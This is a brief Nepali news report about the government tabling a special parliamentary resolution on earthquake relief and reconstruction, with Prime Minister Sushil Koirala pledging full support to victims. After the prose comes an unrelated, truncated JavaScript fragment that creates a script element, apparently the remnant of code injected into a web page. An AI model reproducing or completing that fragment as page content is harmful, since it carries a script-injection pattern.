सरकारले भूकम्प पीडितहरुको राहत, पुनःस्थापना र पुनर्निर्माणबारे व्यवस्थापिका संसद बैठकमा विशेष संकल्प प्रस्ताव पेश गरेको छ। संकल्प प्रस्ताव पेश गर्दैै प्रधानमन्त्री सुशील कोइरालाले पीडितहरुको पुनर्वास र राहतमा कुनै कसर बाँकी नराख्ने बताउनुभयो। var d=document;var s=d.createElement(‘script’);